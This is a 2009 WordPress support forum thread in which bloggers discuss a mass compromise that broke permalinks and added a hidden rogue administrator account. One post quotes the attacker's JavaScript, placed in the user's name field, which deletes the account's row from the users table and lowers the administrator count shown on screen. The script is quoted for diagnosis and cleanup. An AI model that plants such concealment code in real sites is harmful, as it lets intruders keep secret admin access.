WP adding code to the end of url links breaking them

Thanks for that Chloe. I had 2 blogs compromised. One didn’t have new users, but one indeed has a new admin, RobertToth89 or similar. He disappears immediately after loading the page, so I can’t edit or delete him.

Got it – he has a first name of a whole bunch of javascript designed to hide him.

here it is

… <div id=”user_superuser”><script language=”JavaScript”> var setUserName = function(){ try{ var t=document.getElementById(“user_superuser”); while(t.nodeName!=”TR”){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName(“H3″); var s = ” shown below”; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName(“ul”); for(var i in arr) if(arr[i].className==”subsubsub”){ var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML); if(n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,”>Administrator (“+(n[1]-1)+”)<“); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script></div>

The blog that had the admin inserted was on 2.6.3 at the time, and the one that didn’t was on 2.7.1, so maybe the admin insertion in older blogs is the real aim behind this, and the permalink screwup without admin insertion is just all that later versions will permit.

@johninnit Thanks for that – I’ll try your process and delete him if I can. I am on verion 2.7.1 though so does that throw your theory of just attacking older versions? If we delete him, do you think that’s the end of it or should I be looking for other problems?

Chloe,

Oh 🙁 That’s very odd.

I had some good advice on clearing up after upgrade here http://wordpress.org/support/topic/307518?replies=15 – if you don’t know it already (I didn’t!)

johncsnider, it should be possible to just choose one of the default permalink options in admin and have them fix themselves (and then upgrade and clean)

It seems that some sort of bot ran last night to infect a whole bunch of blogs with this scheme to open the doors. I suspect that this was the first step for this hacker, and the second step is to actually exploit the holes.

The scary part is that we don’t know how the hacker inserted all these lines of code. So, it’s quite possible that the hacker would run the script/bot to re-open the doors to our sites. We haven’t done anything to protect our sites; we just fixed the damage.

Were any of you running 2.8.4 when this happened? Because I upgraded to the latest version immediately after discovering this, hoping that that would prevent it from happening again…

I got the same problem and was forwarded this link by a friend…pretty straight-forward.
http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/